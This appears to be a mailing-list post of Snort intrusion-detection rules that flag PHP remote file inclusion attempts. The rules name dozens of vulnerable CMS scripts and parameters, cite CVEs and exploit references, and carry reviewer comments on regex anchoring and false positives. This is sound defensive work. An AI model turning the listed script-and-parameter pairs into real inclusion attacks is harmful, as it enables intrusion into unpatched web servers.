alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
filters_headerfile.php System"; flow:established,to_server;
uricontent:"/filters/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003664; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
links.php System"; flow:established,to_server;
uricontent:"/links/blocks/links.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003665; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
menu_headerfile.php System"; flow:established,to_server;
uricontent:"/menu/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003666; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_news.php System"; flow:established,to_server;
uricontent:"/news/blocks/latest_news.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003667; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
settings_headerfile.php System"; flow:established,to_server;
uricontent:"/settings/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003668; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
users_headerfile.php System"; flow:established,to_server;
uricontent:"/modules/users/headerfile.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003681; rev:3;)
# Pixaria Gallery (CVE-2007-2458 and CVE-2007-2457): remote file inclusion
# via cfg[sys][base_path] in psg.smarty.lib.php and class.Smarty.php.
# Each rule requires the script path and the parameter name in the URI
# (uricontent, case-insensitive) plus a URL scheme -- http(s), ftp(s) or
# php -- right after an '=' (pcre; /U matches the URI buffer, /i ignores case).
# NOTE(review): the pcre is not tied to the named parameter, so a URL in any
# other parameter of the same request also satisfies it -- consider
# anchoring it to the parameter name.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Pixaria Gallery Remote Inclusion Attempt --
psg.smarty.lib.php cfg[sys][base_path]"; flow:established,to_server;
uricontent:"/psg.smarty.lib.php?"; nocase;
uricontent:"cfg[sys][base_path]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2458;
reference:url,www.frsirt.com/english/advisories/2007/1390;
sid:2003691; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Pixaria Gallery Remote Inclusion
class.Smarty.php cfg[sys][base_path]"; flow:established,to_server;
uricontent:"/resources/includes/class.Smarty.php?"; nocase;
uricontent:"cfg[sys][base_path]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2457;
reference:url,www.milw0rm.com/exploits/3733; sid:2003702; rev:3;)
# Plume CMS prepend.php (CVE-2006-0725): remote file inclusion via
# _px_config[manager_path].
# Unlike most rules in this set, the parameter is matched with content and a
# pcre without /U, i.e. against the packet payload rather than the URI
# buffer, and the pcre ends at the ':' (no "/" required, no \s*).
# NOTE(review): matching the raw payload presumably means a percent-encoded
# spelling of the parameter name is not normalized before the match --
# consider uricontent and /U for consistency with the other rules; confirm.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Plume CMS prepend.php Remote File Inclusion
attempt"; flow:to_server,established; uricontent:"/prepend.php";
nocase; content:"_px_config[manager_path]="; nocase;
pcre:"/_px_config\x5bmanager_path\x5d=(https?|php|ftps?)\:/i";
classtype:web-application-attack; reference:cve,CVE-2006-0725;
reference:bugtraq,16662; reference:nessus,20972; sid:2002815; rev:4;)
# Portail includes.php (bugtraq 22361): the pcre is anchored to
# "site_path=", so only a URL scheme in that parameter matches.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Portail Includes.php remote file include";
flow:established,to_server; uricontent:"/includes/includes.php";
nocase; pcre:"/site_path=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22361; classtype:web-application-attack;
sid:2003371; rev:2;)
# Simple PHP Script Gallery (CVE-2007-2679), TopTree (CVE-2007-2544),
# Tropicalm (CVE-2007-2530), TurnKeyWebTools (CVE-2007-2474) and
# VM Watermark (CVE-2007-2575): remote file inclusion attempts.
# Each rule requires the script path and the parameter name in the URI
# (uricontent, case-insensitive) plus a URL scheme -- http(s), ftp(s) or
# php -- right after an '=' (pcre; /U matches the URI buffer, /i ignores case).
# NOTE(review): the pcre is not tied to the named parameter, so a URL in any
# other parameter of the same request also satisfies it. Paths as generic as
# "/index.php?" and "/global.php?" make false positives more likely --
# consider anchoring the pcre to the parameter name.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Simple PHP Script Gallery Remote Inclusion
index.php gallery"; flow:established,to_server;
uricontent:"/index.php?"; nocase; uricontent:"gallery="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2679;
reference:url,www.securityfocus.com/bid/23534; sid:2003746; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TopTree Remote Inclusion Attempt --
tpl_message.php right_file"; flow:established,to_server;
uricontent:"/templates/default/tpl_message.php?"; nocase;
uricontent:"right_file="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2544;
reference:url,www.milw0rm.com/exploits/3854; sid:2003669; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Tropicalm Remote Inclusion Attempt --
dosearch.php RESPATH"; flow:established,to_server;
uricontent:"/dosearch.php?"; nocase; uricontent:"RESPATH="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2530;
reference:url,www.milw0rm.com/exploits/3865; sid:2003678; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
payflow_pro.php abs_path"; flow:established,to_server;
uricontent:"/include/payment/payflow_pro.php?"; nocase;
uricontent:"abs_path="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003687; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
global.php abs_path"; flow:established,to_server;
uricontent:"/global.php?"; nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003688; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
libsecure.php abs_path"; flow:established,to_server;
uricontent:"/libsecure.php?"; nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003689; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB VM Watermark Remote Inclusion Attempt --
watermark.php GALLERY_BASEDIR"; flow:established,to_server;
uricontent:"/watermark.php?"; nocase; uricontent:"GALLERY_BASEDIR=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2575;
reference:url,www.milw0rm.com/exploits/3857; sid:2003692; rev:3;)
# VWar get_header.php and functions_install.php: remote file inclusion via
# vwar_root. Both pcres are anchored to "vwar_root=", so only a URL scheme
# in that parameter matches. The cve references are written without the
# "CVE-" prefix, unlike the 2007 rules in this set.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP VWar Remote File Inclusion
get_header.php"; flow:established,to_server;
uricontent:"/get_header.php"; nocase;
pcre:"/vwar_root=\s*(ftps?|php|https?)\:\//Ui";
reference:url,www.milw0rm.com/exploits/1632; reference:cve,2006-1636;
reference:bugtraq,17358; classtype:web-application-attack;
sid:2002899; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP VWar Remote File Inclusion
functions_install.php"; flow:established,to_server;
uricontent:"/functions_install.php"; nocase;
pcre:"/vwar_root=\s*(ftps?|php|https?)\:\//Ui";
reference:cve,2006-1503; reference:bugtraq,17290;
classtype:web-application-attack; sid:2002902; rev:3;)
# Versado CMS (CVE-2007-2541), Wikivi5 (CVE-2007-2570) and two Wordpress
# plugin scripts (CVE-2007-2484, CVE-2007-2481): script path and parameter
# name via uricontent, then a URL scheme after an '=' via pcre.
# NOTE(review): in these four rules the pcre is not tied to the named
# parameter, so a URL in any other parameter of the same request also
# satisfies it -- consider anchoring it to the parameter name.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Versado CMS Remote Inclusion Attempt --
ajax_listado.php urlModulo"; flow:established,to_server;
uricontent:"/includes/ajax_listado.php?"; nocase;
uricontent:"urlModulo="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2541;
reference:url,www.milw0rm.com/exploits/3847; sid:2003671; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wikivi5 Remote Inclusion Attempt -- show.php
sous_rep"; flow:established,to_server;
uricontent:"/handlers/page/show.php?"; nocase; uricontent:"sous_rep=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2570;
reference:url,www.milw0rm.com/exploits/3863; sid:2003696; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wordpress Remote Inclusion Attempt --
wptable-button.php wpPATH"; flow:established,to_server;
uricontent:"/js/wptable-button.php?"; nocase; uricontent:"wpPATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2484;
reference:url,www.milw0rm.com/exploits/3824; sid:2003685; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wordpress Remote Inclusion Attempt --
wordtube-button.php wpPATH"; flow:established,to_server;
uricontent:"/wordtube-button.php?"; nocase; uricontent:"wpPATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2481;
reference:url,www.milw0rm.com/exploits/3825; sid:2003686; rev:3;)
# iPhotoAlbum header.php (bugtraq 23189): the pcre is anchored to
# "set_menu=", so only a URL scheme in that parameter matches.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB iPhotoAlbum header.php remote file include";
flow:established,to_server; uricontent:"/header.php?"; nocase;
pcre:"/set_menu=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,23189; classtype:web-application-attack;
sid:2003517; rev:2;)
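# Yaap includes/common.php remote file include via root_path.
# pcre anchored to root_path= so the scheme test applies to that parameter's
# value only, not to any "=<scheme>:/" elsewhere in the query string.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB Yaap Remote Inclusion Attempt -- common.php root_path"; \
flow:established,to_server; \
uricontent:"/includes/common.php?"; nocase; \
uricontent:"root_path="; nocase; \
pcre:"/root_path=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2664; \
reference:url,www.milw0rm.com/exploits/3908; sid:2003739; rev:3;)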
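# gnuedu libs/lom.php remote file include via ETCDIR.
# pcre anchored to ETCDIR= so the alert needs a remote scheme in that
# parameter's value; the posted pattern matched it on any parameter.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/libs/lom.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003718; rev:3;)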
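# gnuedu lom_update.php remote file include via ETCDIR.
# pcre anchored to ETCDIR= to cut false positives from other parameters
# that legitimately carry a URL.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom_update.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/lom_update.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003719; rev:3;)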
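# gnuedu scripts/check-lom.php remote file include via ETCDIR.
# pcre anchored to ETCDIR= so only that parameter's value is checked for a
# remote scheme.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- check-lom.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/scripts/check-lom.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003720; rev:3;)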
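# gnuedu scripts/weigh_keywords.php remote file include via ETCDIR.
# pcre anchored to ETCDIR= so only that parameter's value is checked for a
# remote scheme.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- weigh_keywords.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/scripts/weigh_keywords.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003721; rev:3;)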
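# gnuedu logout.php remote file include via ETCDIR.
# "/logout.php?" is a common script name, so the pcre is anchored to ETCDIR=
# to keep the alert tied to the vulnerable parameter.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- logout.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/logout.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003722; rev:3;)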
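# gnuedu help.php remote file include via ETCDIR.
# "/help.php?" is a common script name, so the pcre is anchored to ETCDIR=
# to keep the alert tied to the vulnerable parameter.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- help.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/help.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003723; rev:3;)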
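# gnuedu index.php remote file include via ETCDIR.
# "/index.php?" matches a very large share of web traffic, so the pcre is
# anchored to ETCDIR= to keep the alert tied to the vulnerable parameter.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- index.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/index.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003724; rev:3;)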
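# gnuedu login.php remote file include via ETCDIR.
# "/login.php?" is a common script name, so the pcre is anchored to ETCDIR=
# to keep the alert tied to the vulnerable parameter.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- login.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/login.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003725; rev:3;)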
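# gnuedu web/lom.php remote file include via ETCDIR.
# pcre anchored to ETCDIR= so only that parameter's value is checked for a
# remote scheme.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom.php ETCDIR"; \
flow:established,to_server; \
uricontent:"/web/lom.php?"; nocase; \
uricontent:"ETCDIR="; nocase; \
pcre:"/ETCDIR=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2609; \
reference:url,www.milw0rm.com/exploits/3876; sid:2003747; rev:3;)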
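# MXBB faq.php remote file include via module_root_path.
# pcre anchored to module_root_path= so only that parameter's value is
# checked for a remote scheme.
# NOTE(review): the posted rule also required uricontent:"cmd=". That looks
# like a trait of one specific request shape rather than of the vulnerable
# parameter named in msg, and an include attempt without it would not alert.
# Dropped here; confirm against the advisory before merging.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB MXBB Remote Inclusion Attempt -- faq.php module_root_path"; \
flow:established,to_server; \
uricontent:"/faq.php?"; nocase; \
uricontent:"module_root_path="; nocase; \
pcre:"/module_root_path=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2493; \
reference:url,www.milw0rm.com/exploits/3833; sid:2003684; rev:3;)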
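# pfa CMS index.php remote file include via abs_path.
# "/index.php?" matches a very large share of web traffic, so the pcre is
# anchored to abs_path= to keep the alert tied to the vulnerable parameter.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion index.php abs_path"; \
flow:established,to_server; \
uricontent:"/index.php?"; nocase; \
uricontent:"abs_path="; nocase; \
pcre:"/abs_path=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2559; \
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded; \
sid:2003698; rev:3;)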
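# pfa CMS checkout.php remote file include via abs_path.
# pcre anchored to abs_path= so only that parameter's value is checked for a
# remote scheme; checkout pages often carry return URLs in other parameters.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion checkout.php abs_path"; \
flow:established,to_server; \
uricontent:"/checkout.php?"; nocase; \
uricontent:"abs_path="; nocase; \
pcre:"/abs_path=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2559; \
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded; \
sid:2003699; rev:3;)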
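# pfa CMS libsecure.php remote file include via abs_path.
# pcre anchored to abs_path= so only that parameter's value is checked for a
# remote scheme.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion libsecure.php abs_path"; \
flow:established,to_server; \
uricontent:"/libsecure.php?"; nocase; \
uricontent:"abs_path="; nocase; \
pcre:"/abs_path=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2559; \
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded; \
sid:2003700; rev:3;)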
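# pfa CMS index.php remote file include via repinc.
# "/index.php?" matches a very large share of web traffic, so the pcre is
# anchored to repinc= to keep the alert tied to the vulnerable parameter.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion index.php repinc"; \
flow:established,to_server; \
uricontent:"/index.php?"; nocase; \
uricontent:"repinc="; nocase; \
pcre:"/repinc=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2558; \
reference:url,www.securityfocus.com/archive/1/archive/1/467827/100/0/threaded; \
sid:2003701; rev:3;)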
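# Workbench Survival Guide remote file include via the path parameter.
# "path=" is also the tail of many other parameter names (root_path=,
# abs_path=, ...), so the pcre requires it to start a parameter ([?&]) and
# tests only that parameter's value for a remote scheme.
# NOTE(review): msg names headerfile.php but uricontent matches "/header.php?".
# A request for /headerfile.php? does not contain that string, so one of the
# two is wrong; check the advisory and correct whichever it is.
# Matching differs from the posted revision: bump rev when merging.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB Workbench Survival Guide Remote Inclusion Attempt -- headerfile.php path"; \
flow:established,to_server; \
uricontent:"/header.php?"; nocase; \
uricontent:"path="; nocase; \
pcre:"/[?&]path=\s*(https?|ftps?|php)\:\//Ui"; \
classtype:web-application-attack; reference:cve,CVE-2007-2542; \
reference:url,www.milw0rm.com/exploits/3848; sid:2003670; rev:3;)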
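# Generic PHP remote file include, php: scheme variant of the "monster list".
# Changes from the posted rule:
#  - The pcre ended in "php?", which matches "ph" as well as "php" and has no
#    scheme delimiter, so any listed parameter whose value merely began with
#    "ph" (page=photos, name=phil, ...) raised an alert. It now requires
#    "php:/" (presumably the intent, given the msg; confirm).
#  - uricontent:"php" was redundant: uricontent:".php" already implies it.
# NOTE(review): "(\[.*\])+" nests two unbounded quantifiers and can backtrack
# heavily on long URIs; consider bounding it before enabling on busy sensors.
# NOTE(review): sid:xx is the author's placeholder and the rule will not load
# until a real sid is assigned.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"BLEEDING-EDGE WEB PHP Remote File Inclusion (monster list php)"; \
flow:established,to_server; \
uricontent:".php"; nocase; \
pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*php\:\//Ui"; \
reference:url,www.sans.org/top20/; classtype:web-application-attack; \
sid:xx; rev:1; )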

--
Jamie Riden, CISSP / jamesr@europe.com / jamie@honeynet.org.uk
UK Honeynet Project: http://www.ukhoneynet.org/


-- 
Jamie Riden, CISSP / jamesr@europe.com / jamie@honeynet.org.uk
UK Honeynet Project: http://www.ukhoneynet.org/
